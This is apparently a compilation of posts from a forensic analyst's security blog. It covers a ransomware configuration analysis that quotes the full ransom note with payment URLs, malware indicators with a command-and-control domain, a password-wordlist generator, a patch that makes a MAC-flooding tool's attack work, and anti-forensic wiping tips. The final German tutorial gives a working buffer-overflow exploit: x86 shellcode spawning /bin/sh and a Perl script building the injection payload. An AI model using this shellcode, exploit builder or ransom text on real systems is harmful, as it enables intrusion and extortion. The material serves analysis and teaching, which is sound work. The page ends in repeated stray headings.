ByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAIAAgAGEAKQAgAE8AcABlAG4AIAB5AG8AdQByACAAYQBuAHkAIABiAHIAbwB3AHMAZQByACAAKABDAGgAcgBvAG0AZQAsACAARgBpAHIAZQBmAG8AeAAsACAATwBwAGUAcgBhACwAIABJAEUALAAgAEUAZABnAGUAKQANAAoAIAAgAGIAKQAgAE8AcABlAG4AIABvAHUAcgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBkAGUAYwByAHkAcAB0AG8AcgAuAHQAbwBwAC8AewBVAEkARAB9AA0ACgANAAoAVwBhAHIAbgBpAG4AZwA6ACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlACAAYwBhAG4AIABiAGUAIABiAGwAbwBjAGsAZQBkACwAIAB0AGgAYQB0AHMAIAB3AGgAeQAgAGYAaQByAHMAdAAgAHYAYQByAGkAYQBuAHQAIABtAHUAYwBoACAAYgBlAHQAdABlAHIAIABhAG4AZAAgAG0AbwByAGUAIABhAHYAYQBpAGwAYQBiAGwAZQAuAA0ACgANAAoAVwBoAGUAbgAgAHkAbwB1ACAAbwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQAsACAAcAB1AHQAIAB0AGgAZQAgAGYAbwBsAGwAbwB3AGkAbgBnACAAZABhAHQAYQAgAGkAbgAgAHQAaABlACAAaQBuAHAAdQB0ACAAZgBvAHIAbQA6AA0ACgBLAGUAeQA6AA0ACgANAAoAewBLAEUAWQB9AA0ACgANAAoADQAKAEUAeAB0AGUAbgBzAGkAbwBuACAAbgBhAG0AZQA6AA0ACgANAAoAewBFAFgAVAB9AA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGcAZQAgAG8AZgAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5ACAAYQBuAGQALAAgAGEAcwAgAHIAZQBzAHUAbAB0ACwAIABUAGgAZQAgAEwAbwBzAHMAIABhAGwAbAAgAGQAYQB0AGEALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAA0ACgBPAE4ARQAgAE0ATwBSAEUAIABUAEkATQBFADoAIABJAHQAcwAgAGkAbgAgAHkAbwB1AHIAIABpAG4AdABlAHIAZQBzAHQAcwAgAHQAbwAgAGcAZQB0ACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAgAGIAYQBjAGsALgAgAEYAcgBvAG0AIABvAHUAcgAgAHMAaQBkAGUALAAgAHcAZQAgACgAdABoAGUAIABiAGUAcwB0ACAAcwBwAGUAYwBpAGEAbABpAHMAdABzACkAIABtAGEAawBlACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcALAAgAGIAdQB0ACAAcABsAGUAYQBzAGUAIABzAGgAbwB1AGwAZAAgAG4AbwB0ACAAaQBuAHQAZQByAGYAZQByAGUALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAAAA",
   "nname":"{EXT}-readme.txt",
   "exp":false,
   "img":"QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA",
   "arn":false
}

What are the contents of nbody and img? Thats simple:

nbody

---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}.

By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.

To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.

If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!

a) Download and install TOR browser from this site: https://torproject.org/

b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:

a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)

b) Open our secondary website: http://decryptor.top/{UID}

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:

Key:

{KEY}

Extension name:

{EXT}

-----------------------------------------------------------------------------------------

!!! DANGER !!!

DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.

!!! !!! !!!

ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.

!!! !!! !!!

img

All of your files are encrypted!

Find {EXT}-readme.txt and follow instuctions

Bad crypto

In my eyes, the interesting part of the section is the following entry:

"pk":"3sB5vqBW0kuO3Nr56Ql+TMjaDchoEjxcKxBA/XbSJks="

The value of this entry (which is 256 bits large) is decoded and stored as a global static variable at 0x00??DBA0 (the address may be different on your system at the position that I marked with ??). Unfortunately, I was not able to spot further read or write accesses to this address, but I'm working on it.

Other traces

File size

All encrypted files have the same size as their unencrypted pendants. This means:

some kind of stream cipher is being used, such as AES-CTR or AES-GCM
there are no meta information stored in the files

Domains

The entry dmn contains a list of domains, which may be compromised and may be used to spread malware. So I filed a claim and sent the full list to the police. Let's see if they can inform all potential victim. However, you should for now at least log accesses to the mentioned sites.

New Malware: "Pro InvoiceWMZ45445"

December 1, 2015 · 2 min read

Jan Starke

Senior Forensic Analyst

During the last few days I received two mails with the following attachment:

Pro InvoiceWMZ45445.rar

which contains an .exe file with the same name:

ProInvoice1

Metadata of Pro InvoiceWMZ45445.exe:

MD5: 4EE08155DB928C449EDEA28D6A68B8CA
SHA1: 6F57853E8788E2BD8E1433D8B2E1A701774593A4
File Version: 1.0.0.1
File Description: TODO: <File description>
Created with: Microsoft Visual C++ ver. 8.0 [DEBUG] / Visual Studio 2005

Indicators of Compromise (IOC) of Pro InvoiceWMZ45445.exe:

Upon execution, the file does the following:

wait 30 seconds
create a file sample.exe under %AppData%RoamingNew folder
starts the previously created file
installs the sample.exe under HKCUSoftwareMicrosoftWindowsCurrentVersionRunSample (Autostart)
changes some Internet Explorer Setting

procdot

Metadata of sample.exe:

sample.exe has the same Hashes as Pro InvoiceWMZ45445.exe. Interesting, isn't it? So, this Malware isn't a Dropper; but instead it installs itself under a different name.

Indicators of Compromise (IOC) of sample.exe:

creates the Mutant Sessions1BaseNamedObjectsMUTEX-zZEeV-Zndko
tries to resolve fredamata81.ddns.net
tries to connect to port 2015 of fredamata81.ddns.net (which seems to be closed at the moment)
consumes a lot of CPU time (20% on my machine)

Additional Information

The executable has Debug information stored externally in d:bak_desktopnew folderstub1000_11_25_2015bdebugstub1000_11_25_2015b.pdb. I assume the file has been compiled on 2015/11/25. Maybe ;-)

More dynamic analysis will follow soon. First I must remove the call to IsDebuggerPresent(). But not today, anymore...

Update:

Virustotal has documented this specimen under https://www.virustotal.com/de/file/bf6c2c3f9cbb35023a38516e6b438f9125b7056429804c88c444fa37e0254956/analysis/

Merging wordlist files

August 5, 2015 · 3 min read

Jan Starke

Senior Forensic Analyst

Sometimes when cracking password, one has to create password candidates which are combinations of words from a wordlist. Unfortunately, common password cracking tools do not support this feature. This makes perfectly sense, because the task of a password cracking tool is cracking passwords. We need a tool which creates line wise cross combinations of text files.

Using perl, this is a simple task:

#!/usr/bin/perl -w

#/usr/bin/perl -w
use strict;
use warnings;
use Getopt::Long;

my $first = '-';
my $second = undef;
my $dest = '-';
my $max_length = undef;

sub Usage(;$) {
    my $usage = '';
    if (my $message = shift) {
        $usage .= $message . "n";
    }

    $usage .= "crossproduct.pl --first=<infile> --second=<infile> --dest=<outfile>";
    $usage;
}

sub ValidateInputFile($) {
    my $filename = shift;
    return if $filename eq '-';
    -f $filename or die Usage("'$filename' is not a file");
    -r $filename or die Usage("'$filename' is not readable");
}

sub ValidateOutputFile($) {
    my $filename = shift;
    return if $filename eq '-';
    return unless -e $filename;

    # the file does not exist, so it will be created
    -f $filename or die Usage("'$filename' is not a file");
    -w $filename or die Usage("'$filename' is not writable");
}

GetOptions (
    "first=s" => $first,
    "second=s" => $second,
    "dest=s" => $dest,
    "length=i" => $max_length) or die Usage();

defined($first) or die Usage("missing first input file");
defined($second) or die Usage("missing second input file");
($first ne '-' or $second or '-') or die Usage("cannot combine stdin with itself");

ValidateInputFile($first);
ValidateInputFile($second);
ValidateOutputFile($dest);

my ($first_fh, $second_fh, $dest_fh);
if ($first eq '-') {
    $first_fh = *STDIN;
} else {
    open($first_fh, "<$first") or die Usage($!);
}

if ($second eq '-') {
    $second_fh = *STDIN;
} else {
    open($second_fh, "<$second") or die Usage($!);
}

if ($dest eq '-') {
    $dest_fh = *STDOUT;
} else {
    open($dest_fh, ">$dest") or die Usage($!);
}

my ($a, $b, $da, $db);
my ($dest_first, $dest_second);

if ($first eq '-') {
    ($a, $b) = ($first_fh, $second_fh); 
    ($dest_first, $dest_second) = ($da, $db);
} else {
    ($a, $b) = ($second_fh, $first_fh);
    ($dest_second, $dest_first) = ($da, $db);
}

while ($da = <$a>) {
    seek($b, 0, 0);
    while ($db = <$b>) {
        chomp $da;
        chomp $db;
        my $word = "$$dest_first$$dest_second";
        if ($max_length) {
            $word = substr($word, 1, $max_length); 
        }

        print $dest_fh "$word";
    }
}

The script has 4 parameters:

Parameter	Meaning
`--first`	file name of the wordlist for the first part of the generated words; or "-" for stdin (which is the default value)
`--second`	file name of the wordlist for the second part of the generated words; or "-" for stdin
`--dest`	name of the file where the generated wordlist will be stored; or "-" for stdout (which is the default value)
`--length`	maximum length of generated words. All words which are longer then this value will be truncated. This parameter is optional. If you use this parameter, you should pipe the output to uniq

Rexgen is back again

March 8, 2015 · One min read

Jan Starke

Senior Forensic Analyst

... with a new version 1.2.3 and a new repository location: https://github.com/janstarke/rexgen

New features:

improved uppercase/lowercase variation: 'a(?i:bc)' creates abc, abC, aBC, aBc
that's it. But I had to rewrite a lot of internal data representation, so that the modifier i for ignore case may be the first one in long list of additional iterators. One of my ideas for the next versions is some kind of Levenshtein Iterator. The idea is that the modifier will create all variants of a word with a Levenshtein distance of 1

What else is new?

John the Ripper (jumbo) uses the new API of rexgen, so you can build the newest version JtR together with the newest version of rexgen
wfuzz does not use rexgen, until now. I created a fork of wfuzz https://github.com/janstarke/wfuzz. Unfortunately, xmendez ignores my pull request :-( But you can use my fork and I will try to keep it up2date

So long

How to (not) hack jasa's blog

February 11, 2015 · 3 min read

Jan Starke

Senior Forensic Analyst

Today, a strange guy tried to hack this blog. He didn't succeed. What a shame. So, in this post, I will try to give you some hints about what to do and what not to do if you're trying to hack into this blog:

Try to guess my username and password. Start with jasa. This is not my username, but you can try it anyway. I'm a hacker, so try good passwords first. You're a hacker too, so you are using good passwords as wesll. Start with your own passwords; maybe all hackers use the same passwords. Nope. Try "Raketenkatze123" Nope. Use the wordlist you've found on the internet. After the first 1000 attempts I know which wordlist you are using and can check if my password is part of it. ...which is one thing I regularly do with all of my passwords, as soon as I find a new good wordlist.
Try to find some cross site scripting. After you've found one (there is none known), you can 2.a Send a malicious link to me, to steal my session 2.b Create a malicious comment, to steal my session 2.c Create a malicious comment, to exploit one of the currently known cross site request forgery vulnerabilities in wordpress.

Have you first checked if wordpress is vulnerable against session hijacking, before you fill wordpress's log files and my mailbox with your useless attempts? By the way:

Make sure that no one knows you. Although I cannot read wordpress's log files, you've been so kind to try to create a malicious comment. I've got a notification about this. Now, I have your IP address and the corresponding time. Did you know that it is possible to identify the computer you are using at the moment? The power feature is called "Telecommunications data retention"
Try to find a SQL injection vulnerability. Good luck. In the meantime I was able to geolocate your position, using your IP. Until now, you violated at least 2 statutes of the country you are living in.
Before you did some reconnaissance, hopefully you made sure that no other legal persons are involved in your attack. Now, you determine that my blog is not hosted by me, but by wordpress.com, whose place of jurisdiction is the United States. D'oh. They know your IP address, too.
Double-check that you typed the URL of this blog using your keyboard. You didn't want to click on a link to this blog, because I could see your Referer :-b
This is a blog about security (among others). Make sure your browser is up to date before you open this page (TODO: I must move this entry to position 1)

Kind regards

See you tomorrow, M. :-)

BTW, I forgot to say that you forgot to do a port scan against the LB of wordpress.com. Which doesn't matter anymore ... Knock knock

Measuring Forensic Readiness

February 2, 2015 · 2 min read

Jan Starke

Senior Forensic Analyst

Most of our customers need help in optimizing their infrastructure security. What does that mean? You want to

minimize your attack surface
prevent any successful attacks to (publicly) available services
limit the impact of successful attacks
be able to recover after a successful attack
know what actually happened

This last point, knowing what actually happened, can be achieved through various approaches:

You could do logging of all significant events
You could use a SIEM component to collect, correlate and evaluate all logging events and, if you want to, netflow data
You can do forensic analysis of your hard drives, log files, etc.

Forensic Readiness first seemed to us as the situation in which you are able to do forensics. But this is not precise enough. In fact, we can determine multiple levels of forensic readiness, in which you are able to answer the following questions:

Did anything happen at all?
What have been the symptoms of the incident?
When did the symptoms first arise?
Which systems are affected?
What exactly happened to the affected systems?
At which day and time did the attack start?
Which other machines are compromised as well?
From which machines did the attack originate?
Which user account was used to initially run the attack?
Which persons are able to use the user account that ran the attack

The more questions you was able to answer (in order) in the case an incident occurs, the more "forensic ready" are you.

Invalid TCP segments created by macof

February 1, 2015 · 2 min read

Jan Starke

Senior Forensic Analyst

Some days ago, we used the tool macof, which is part of the dsniff package, in one penetration test. We observed that our attack had no effect to the hosts in the network, so we started sniffing around. Wireshark was our friend.

Wireshark identified our packets, generated by macof, as "invalid". It took some time for us to realize that IP Header value for Total Length was indeed wrong! We used macof to send TCP SYN segments to some specific port, so Total Length should be 40 (20 Byte IP Header + 20 Byte TCP Header), but macos generated packets with a value of 20.

So we started a little code reading session and found the following statements in macof.c:

libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0);

libnet_build_ipv4(LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);

Obviously, the length of the IP Header is not included in this calculation. We changed the above statements to

libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0);

libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);

with the result, that Wireshark didn't complain about our packets anymore.

And, more important, our attack did work now :-)

After the test, I sent an email to the author of macof and dsniff, including a patch of what we've done, but until today I received no answer. So, I'll publsh our patch here, and you are free to use it:

 diff -rupN dsniff-2.4_beta1-r6/macof.c dsniff-2.4_beta1-r6_FIX/macof.c

--- dsniff-2.4_beta1-r6/macof.c	2015-01-20 08:50:53.980054279 +0100
+++ dsniff-2.4_beta1-r6_FIX/macof.c	2015-01-20 08:51:24.220054894 +0100
@@ -134,7 +134,7 @@ main(int argc, char *argv[])
 		libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
 				 0, 0, LIBNET_TCP_H, NULL, 0, l, 0);
 		
-		libnet_build_ipv4(LIBNET_TCP_H, 0,
+		libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
 				  libnet_get_prand(LIBNET_PRu16), 0, 64,
 				  IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);

Userspace tool for (anti-forensically safe) wiping unallocated disk space

February 20, 2014 · 2 min read

Jan Starke

Senior Forensic Analyst

This is just a simple idea and could as easily be rewritten in, e.g., Powershell, Perl, Python or whatever you want.

I had some problems with compressing the image of a virtual machine, which has been intensively used for a long period of time. I deleted all files inside the VM, but this does not really wipe the data, so that blocks of deleted files must be compressed as well. The simple fix of this is to overwrite unallocated blocks with all zeros.

Now, how to accomplish this? This is easy: We create a new file, and fill it with zeros. If we are finished (fwrite()failes), we are done and delete the file. That's it.

Here is the code. Feel free to reimplement it in the language of your choice:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

const size_t block_size = 512;
const size_t block_count = 1;
static const char* filename = "diskwipe.dat";
static char* block = 0;
static FILE* fp = NULL;

void cleanup() {
	if (block) {
		free(block);
	}

	if (fp != NULL) {
		fflush(fp);
		fclose(fp);
		fp = NULL;
	}

	if (0 != _unlink(filename)) {
		perror("Unable to delete diskwipe.dat: ");
	}
}

void finish(int res) {
	cleanup();
	exit(res);
}

void handle_sigint (int sig) {
	finish(1);
}

void do_wipe() {
	unsigned long int count = 0;
	fp = fopen(filename, "wbc");
	if (fp == NULL) {
		perror("Unable to open diskwipe.dat: ");
		finish(1);
	}

	while (block_count == fwrite(block, block_size, block_count, fp)) {
		fflush(fp);
		fprintf(stderr, "\\r%lu", ++count);
	}
	fclose(fp);
}

int main(int argc, char* argv[]) {
	signal(SIGINT, handle_sigint);

	block = (char*) malloc(block_size);
	memset(block, 0, block_size);
	
	do_wipe();
	finish(0);
}

By the way, this is a very simple way for doing anti forensics:

do bad stuff
delete your files/traces
do a userspace wipe using a builtin scripting language, preferably using a one-liner

Solaris: Bufferoverflows in lx-Zones ausnutzen

January 27, 2014 · 7 min read

Jan Starke

Senior Forensic Analyst

In diesem Artikel wird gezeigt, dass es möglich ist, in einer Linux-Zone unter Solaris einen Shellcode auszuführen, wenn dieser einen bestimmten Aufbau hat.

Zunächst wird beispielhaft ein Programm gezeigt, dass eine Bufferoverflow-Schwachstelle hat. Anschließend wird ein Shellcode entwickelt, der die Besonderheiten der User-Level-Calls in einer lx-Zone unter Solaris berücksichtigt. Das wird erreicht, indem der lx_brandz.so.1 ein virtueller Stack untergeschoben wird, damit der Shellcode während des Aufrufs von exec() nicht verändert wird. Abschließend werden ein Programm und ein Script entwickelt, die zusammen einen kompletten Injection-Vector erzeugen.

Um das Beispiel einfach zu halten, wird ein einfacher Stack-basierter Überlauf genutzt. Das angegriffene Programm wird nachfolgend gezeigt:

#include <stdio.h>
#include <sys/mman.h>
#include <errno.h>

#define UNPROTECT_STACK
#define STACK_BEGIN 0x08046000
#define STACK_SIZE 8192
#define STACK_PERMISSIONS PROT_READ | PROT_WRITE | PROT_EXEC

Die Funktion __get_esp() wird über das Makro TRACE_ESP genutzt, um die Adresse des Stack auszugeben. Normalerweise steht in einem anzugreifenden Programm dieses Feature nicht zur Verfügung, daher kann es auch hier abgeschaltet werden. In einem solchen Fall kann der Wert des %esp-Registers einfach über die Nutzung eines Debuggers ermittelt werden.

unsigned long __get_esp() {
  __asm__("movl %esp,%eax");
}
#ifdef PRINT_ESP
#define TRACE_ESP(functionname) \
 (printf("%s at %%esp: 0x%08x\n", (functionname), __get_esp()))
#else
#define TRACE_ESP(functionname)
#endif

Aus Demonstrationszwecken wurde die Funktion __gets() programmiert, die sich jedoch in etwa wie gets() verhält. Der qualitative Unterschied ist, dass das Verhalten der Funktion beim Lesen von Binärdaten besser beeinflusst werden kann.

/* dangerous: __gets is evil!!! never call this function!!! */
void __gets(char* ptr) {
 char c;
 while (fread(&c, sizeof(c), 1, stdin)) {
  if (c == '\n')
   break;
  else
   *ptr++ = c;
 }
 *ptr = '\0';
}

Der Angriff selbst richtet sich gegen die Funktion do_work(). Es wird ausgenutzt, dass __gets() in den Buffer name schreibt, ohne zu prüfen, ob genügend Platz im Buffer ist.

void do_work() {
 char name[512];
 TRACE_ESP("do_work");
 printf("What's your name? ");
 __gets(name);
 printf("hello, %s\n", name);
}

Interessant ist im Hauptprogramm vor dem Aufruf von do_work() die Manipulation der Zugriffsrechte des Stacks. Hier ist es für den Interessierten möglich, zu testen, wie sich das Programm bei eingeschränkten Zugriffsrechten (insbesondere ohne PROT_EXEC) verhält.

int main(void) {
#ifdef UNPROTECT_STACK
 if (0 != mprotect((void*)STACK_BEGIN,
       STACK_SIZE, STACK_PERMISSIONS)) {
  fprintf(stderr, "mprotect: %s\n", strerror(errno));
  return -1;
 }
#endif
 TRACE_ESP("main");
 do_work();
 return 1;
}

Der Täter

Der Shellcode arbeitet in mehreren Schritten:

Sprung zum Ende des Shellcodes (call_position) und wieder zurück an den Anfang. Damit liegt die Adresse des ersten Bytes nach dem call auf dem Stack. Diese wird dann in %esi gespeichert.
Anlegen eines neuen Stackframes unterhalb des Shellcodes. Das Problem ist, dass in der Testumgebung (Solaris Brandz mit Linux) ein Aufruf von int $0x80 in eine Anwendungsbibliothek (lx_brandz.so.1) weitergeleitet wird. Diese Funktionsaufrufe belegen natürlich Platz auf unserem Stack und überschreiben die Zeichenkette "/bin/sh" und die beiden Pointer argv und env. Durch das Erzeugen des neuen Stackframes werden die Daten vor dem Überschreiben geschützt.
stdin schließen und wieder neu starten. Bei der Vorführung wird das Programm den Injection Vector (IV) per Pipe oder Eingabeumleitung lesen. Nach dem vollständigen Lesen des IV und anschließenden Starten von /bin/sh wird read() keine Daten mehr zu lesen haben, was die Shell als EOF interpretiert und sich beendet. Daher schließen wir die Pipe und öffnen /dev/tty als Dateideskriptor 0, was stdin entspricht.
Ausführen von /bin/sh. Eine ausführliche Erklärung dieses Programmfragments findet sich in Aleph One: Smashing The Stack For Fun And Profit. Phrack, Volume Seven, Issue Forty-Nine.

char shellcode[] = 
  "\xeb\x43"      /*   jmp    0x804840d <call_position> */
  "\x5e"          /*   pop    %esi */
 /* create artificial stack begin */
  "\x89\xf4"      /*   mov    %esi, %esp */
  "\x89\xf5"      /*   mov  %esi, %ebp */
  "\x83\xed\x40"  /*   sub  $0x40, %ebp */
  "\x83\xec\x60"  /*   sub  $0x60, %esp */
 /* close stdin and reopen it */
  "\x56"          /*   push   %esi */
  "\x31\xc0"      /*   xor    %eax,%eax */
  "\xb0\x06"      /*   mov    $0x6,%al */
  "\x31\xdb"      /*   xor    %ebx,%ebx */
  "\xcd\x80"      /*   int    $0x80 */
  "\x5e"          /*   pop    %esi */
  "\x56"          /*   push   %esi */
  "\x31\xc0"      /*   xor    %eax,%eax */
  "\x88\x46\x0f"  /*   mov    %al,0x0f(%esi) */
  "\xb0\x05"      /*   mov    $0x5,%al */
  "\x8d\x5e\x07"  /*   lea    0x7(%esi),%ebx */
  "\x31\xc9"      /*   xor    %ecx,%ecx */
  "\xcd\x80"      /*   int    $0x80 */
  "\x5e"          /*   pop    %esi */
 /* exec /bin/sh (I copied the whole thing from shellcode.org) */
  "\x89\x76\x08"  /*   mov    %esi,0x8(%esi) */
  "\x31\xc0"      /*   xor    %eax,%eax */
  "\x88\x46\x07"  /*   mov    %al,0x7(%esi) */
  "\x89\x46\x0c"  /*   mov    %eax,0xc(%esi) */
  "\xb0\x0b"      /*   mov    $0xb,%al */
  "\x89\xf3"      /*   mov    %esi,%ebx */
  "\x8d\x4e\x08"  /*   lea    0x8(%esi),%ecx */
  "\x8d\x56\x0c"  /*   lea    0xc(%esi),%edx */
  "\xcd\x80"      /*   int    $0x80 */
  "\x31\xdb"      /*   xor    %ebx,%ebx */
  "\x89\xd8"      /*   mov    %ebx,%eax */
  "\x40"          /*   inc    %eax */
  "\xcd\x80"      /*   int    $0x80 */
  "\xe8\xb8\xff\xff\xff"  /*   call   start_of_exploit */
  "/bin/sh"
  "/dev/tty";

`shellcode.c`

Wir nutzen nachfolgendes Programm, um den Shellcode auszugeben bzw. den Injection Vector zu konstruieren. Das Programm versteht die Parameter -l (Ausgeben der Länge des Shellcode) und -x (Ausführen des Shellcodes). Wenn man das Programm ohne Parameter ausführt, wird der Shellcode auf stdout ausgegeben.

Der Shellcode selbst sollte in einer Variable namens shellcode gespeichert sein, die wiederum in einer Headerdatei definiert ist. Diese Headerdatei wird -- ungewöhnlicherweise -- mitten innerhalb von main() eingebunden. Die Ursache dafür ist, dass der Shellcode davon ausgeht, sich innerhalb des Stacks zu befinden. Um den Shellcode zu testen, sollte man also eine möglichst realistische Umgebung schaffen und den Shellcode in einem lokalen Puffer speichern.

Auch hier möchte ich wieder auf die Möglichkeit hinweisen, die Verhaltensweise des Shellcodes bei einem mit mprotect() geschützten Stack auszuprobieren.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
 
int
main(int argc, char* argv[]) {
/* include shellcode buffer here, so that it is stored on the stack */
#include "own.c"
 if (argc == 1) {
  printf("%s", shellcode);
  return 0;
 }
 if (argc == 2 && 0 == strcmp(argv[1], "-l")) {
  printf("%d\n", strlen(shellcode));
  return 0;
 }
 if (argc == 2 && 0 == strcmp(argv[1], "-x")) {
  /* allow to execute code on the stack */
  mprotect((void*)0x08046000, 8192, PROT_READ | PROT_WRITE | PROT_EXEC);
  void (*code)() = (void(*)())shellcode;
  code();
  return -1;
 }
 fprintf(stderr, "Usage: %s [-l|-x]\n", argv[0]);
 return 1;
}

`shellcode.pl`

Dieses Perl-Script ist ein Wrapper für das aus shellcode.c entstehende Programm, der den kompletten Injection Vector (IV) konstruiert. Der IV besteht aus folgenden Teilen:

viele NOPs. Dieser Bereich wird zum NOP-Sliding genutzt, da wir uns hier nicht damit beschäftigen wollen, wie wir den Shellcode direkt bytegenau ansprechen können.
Shellcode
nochmal NOPs. Manchmal könnte es sinnvoll sein, den Shellcode etwas in den Bereich niedriger Adressen zu verschieben. Als Platzhalter bis zum Instruction Pointer dienen diese NOP-Befehle. EBP. Eine 4 Byte große Zahl, die die Basisadresse des nächsthöheren Stackframes ist. Da unser Shellcode einen neuen Stackframe anlegt, kann diese Zahl beliebig sein. EIP. Eine 4 Byte große Zahl, die die Adresse des ersten auszuführenden Befehls des IV ist. Den korrekten Wert dieser Adresse zu ermitteln bedeutet, sich einige Zeit mit einem Debugger zu beschäftigen. Ich möchte hier ebenfalls auf die Lektüre der sehr ausführlichen Texte des Phrack-Magazins verweisen. Das Script bekommt als Parameter die Länge des zu überschreibenden Puffers und die Anzahl der nach dem Shellcode einzufügenden NOPs übergeben. Wie man diese Zahlen ermittelt, wird an dieser Stelle ebenfalls nicht besprochen.

Die Gesamtgröße des auf stdout ausgegebenen IV ist 8 Byte größer als die angegebene Pufferlänge (für EBP und EIP).
```
#!/usr/bin/perl -w
use strict;
 
if (2 != scalar @ARGV) {
 die "./shellcode.pl  \n";
}
 
my $buffer_length = $ARGV[0];
my $nop_length2 = $ARGV[1];
 
binmode STDOUT;
 
chomp (my $shellcode_length = \`./shellcode -l\`);
my $shellcode = \`./shellcode\`;
my $nop_length1 = $buffer_length - $shellcode_length;
my $eip_recurrence=1;
 
print STDERR "shellcode length: $shellcode_length bytes\n";
print STDERR "buffer length:    $buffer_length bytes\n";
print STDERR "nop sliding 1:    $nop_length1 bytes\n";
print STDERR "nop sliding 2:    $nop_length2 bytes\n";
 
my $eip = chr(0x20) . chr(0x75) . chr(0x04) . chr(0x08);
my $ebp = $eip;

my $nop_slide1 = (chr(0x90)x$nop_length1);
my $nop_slide2 = (chr(0x90)x$nop_length2);
my $iv = $nop_slide1 . $shellcode . $nop_slide2 . $ebp . ($eip x $eip_recurrence);
 
print STDOUT $iv;
```

nbody​

img​

Bad crypto​

Other traces

File size​

Domains​

New features:​

What else is new?​

Der Täter

shellcode.c

shellcode.pl

nbody

img

Bad crypto

File size

Domains

New features:

What else is new?

`shellcode.c`

`shellcode.pl`